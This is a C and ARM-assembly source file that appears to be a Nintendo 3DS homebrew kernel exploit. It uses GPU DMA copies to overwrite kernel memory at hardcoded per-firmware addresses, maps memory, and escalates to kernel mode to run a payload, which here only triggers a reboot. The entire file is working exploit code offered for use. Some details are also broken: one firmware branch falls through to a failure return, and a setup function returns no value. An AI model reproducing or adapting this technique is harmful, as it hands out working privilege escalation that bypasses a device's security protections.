#define START_SECTION __attribute__ ((section (".text.start"), naked))

// make sure code is PIE
#ifndef __PIE__
#error "Must compile with -fPIE"
#endif

#define FILE_R 0x1

typedef struct file_s {
	int s;
	int pos;
	int size;
} FILE;

int(*IFile_Open)(FILE *this, const short *path, int flags) = (void *)0x0022FE08;
int(*IFile_Read)(FILE *this, unsigned int *read, void *buffer, unsigned int size) = (void *)0x001686DC;

int(*svcSleepThread)(unsigned long long nanoseconds) = ((void *)0x0023FFE8);

int(*GX_SetTextureCopy)(void *input_buffer, void *output_buffer, unsigned int size, int in_x, int in_y, int out_x, int out_y, int flags) = ((void *)0x0011DD48);
int(*GSPGPU_FlushDataCache)(void *addr, unsigned int len) = ((void *)0x00191504);

//int(*svcControlMemory)(void **outaddr, unsigned int addr0, unsigned int addr1, unsigned int size, int operation, int permissions) = ((void *)0x001431A0);
int svcControlMemory(unsigned int* addr_out, unsigned int addr0, unsigned int addr1, unsigned int size, int op, int perm);

// Release the gpu handle that spider has
void releaseGpu(unsigned int address);

// Get version specific data
int getVersionData(void);

// Set-up the kernel mode environment
int setupKernelMode(void);

// Execute the function in kernel mode
int __attribute__((naked)) executeKernelMode(int (*function)(void));

// Gets called in kernel mode
int __attribute__((naked)) kernelModeStub(void);

// Gets called in kernel mode
// Put code in here
void kernelMode(void);

void gspwnCopy(void *dest, void *source, unsigned int size, unsigned int checkValue, unsigned int checkOffset);

unsigned int kernelPatchAddress;
unsigned int svcPatchAddress;
unsigned int rebootAddress;

int __attribute__((naked)) svcControlMemory(unsigned int* addr_out, unsigned int addr0, unsigned int addr1, unsigned int size, int op, int perm){
	__asm__ __volatile__(
		"push {r0, r4}\t\n"
		"ldr  r0, [sp, #0x8]\t\n"
		"ldr  r4, [sp, #0x8+0x4]\t\n"
		"svc  0x01\t\n"
		"ldr  r2, [sp], #4\t\n"
		"str  r1, [r2]\t\n"
		"ldr  r4, [sp], #4\t\n"
		"bx   lr"
	);
}

int main(void){
	
	setupKernelMode();
	executeKernelMode(kernelModeStub);
	
	
	return 0;
}

int __attribute__((naked)) executeKernelMode(int (*function)(void)){
	__asm__ (
		"svc 8\t\n"
		"bx lr\t\n"
	);
}

void kernelMode(void){
	int (*reboot)(int, int, int, int) = (void *)rebootAddress;
	
	reboot(0, 0, 2, 0);
}

int __attribute__((naked)) kernelModeStub(void){
	__asm__(
		"add sp, sp, #8"
	);
	
	kernelMode();
	
	__asm__(
		"movs r0, #0\t\n"
		"ldr pc, [sp], #4"
	);
}

int setupKernelMode(void){
	if(getVersionData() == -1){
		return -1;
	}
	
	int i;
	unsigned int tempAddress;
	unsigned int *buffer = (unsigned int *)0x18410000;
	
	unsigned int memory;
	svcControlMemory(&memory, 0, 0, 0x2000, 0x10003, 0x3);
	unsigned int freeMemory = memory + 0x1000;
	
	int (*nopFunction)(void);
	
	svcControlMemory(&tempAddress, freeMemory, 0, 0x1000, 1, 0);
	
	buffer[0] = 1;
	buffer[1] = kernelPatchAddress;
	buffer[2] = 0;
	buffer[3] = 0;
	
	gspwnCopy((void *)freeMemory, (void *)buffer, 0x10, kernelPatchAddress, 4);
	svcControlMemory(&tempAddress, memory, 0, 0x1000, 1, 0);
	
	for(i = 0; i < 0x1000; i++){
		buffer[i] = 0xE1A00000;	// nop
	}
	
	buffer[i - 1] = 0xE12FFF1E;	// arm bx lr
	
	nopFunction = (void *)0x08F02894 - 0x10000;
	gspwnCopy((void *)buffer, (void *)nopFunction, 0x10000, 0xE1A00000, 0);
	
	nopFunction();
}

int getVersionData(void){
	// Get kernel version
	unsigned int kernelVersion = *(unsigned int *) 0x1FF80000;
	kernelPatchAddress = 0;
	svcPatchAddress = 0;
	rebootAddress = 0;
	
	if(kernelVersion == 0x02220000){
		kernelPatchAddress	= 0xEFF83C97;
		svcPatchAddress		= 0xEFF827CC;
		rebootAddress		= 0xFFF748C4;
		return 0;
	}else if(kernelVersion == 0x02230600){
		kernelPatchAddress	= 0xEFF8372F;
		svcPatchAddress		= 0xEFF822A8;
		rebootAddress		= 0xFFF64B94;
		return 0;
	}else if(kernelVersion == 0x02240000){
		kernelPatchAddress	= 0xEFF8372B;
		svcPatchAddress		= 0xEFF822A4;
		rebootAddress		= 0xFFF64B90;
		return 0;
	}else if(kernelVersion == 0x02250000){
		kernelPatchAddress	= 0xEFF8372B;
		svcPatchAddress		= 0xEFF822A4;
		rebootAddress		= 0xFFF64A78;
	}else if(kernelVersion == 0x02260000){
		kernelPatchAddress	= 0xEFF8372B;
		svcPatchAddress		= 0xEFF822A4;
		rebootAddress		= 0xFFF64A78;
		return 0;
	}else if(kernelVersion == 0x02270400){
		kernelPatchAddress	= 0xEFF8372F;
		svcPatchAddress		= 0xEFF822A8;
		rebootAddress		= 0xFFF64AB0;
		return 0;
	}else if(kernelVersion == 0x02280000){
		kernelPatchAddress	= 0xEFF8372B;
		svcPatchAddress		= 0xEFF822A4;
		rebootAddress		= 0xFFF64AAC;
		return 0;
	}else if(kernelVersion == 0x022C0600){
		kernelPatchAddress	= 0xDFF83767;
		svcPatchAddress		= 0xDFF82294;
		rebootAddress		= 0xFFF54BAC;
		return 0;
	}else if(kernelVersion == 0x022E0000){
		kernelPatchAddress	= 0xDFF83837;
		svcPatchAddress		= 0xDFF82290;
		rebootAddress		= 0xFFF151C0;
		return 0;
	}
	
	return -1;
}

// 0x003DA72C
// Thanks smealum!
void releaseGpu(unsigned int address){
	__asm__ __volatile__ (
		"mrc p15, 0, r8, c13, c0, 3\n"
		"add r8, #0x80\n"
		"ldr r0, =0x00170000\n"
		"str r0, [r8], #4\n"
		"ldr r0, =0x003DA72C\n"
		"ldr r0, [r0]\n"
		".word 0xEF000032\n"
	);
}

void gspwnCopy(void *dest, void *source, unsigned int size, unsigned int checkValue, unsigned int checkOffset){
	unsigned int result;
	
	do{
		GSPGPU_FlushDataCache(source, size);
		GX_SetTextureCopy(source, dest, size, 0, 0, 0, 0, 8);
		GSPGPU_FlushDataCache(dest, size);
		GX_SetTextureCopy(dest, source, size, 0, 0, 0, 0, 8);
		
		result = *(unsigned int *)(source + checkOffset);
	}while(result != checkValue);
}

int START_SECTION entryPoint(){
	__asm__ volatile(".word 0xE1A00000");
	main();
	__asm__ volatile("bx lr");
}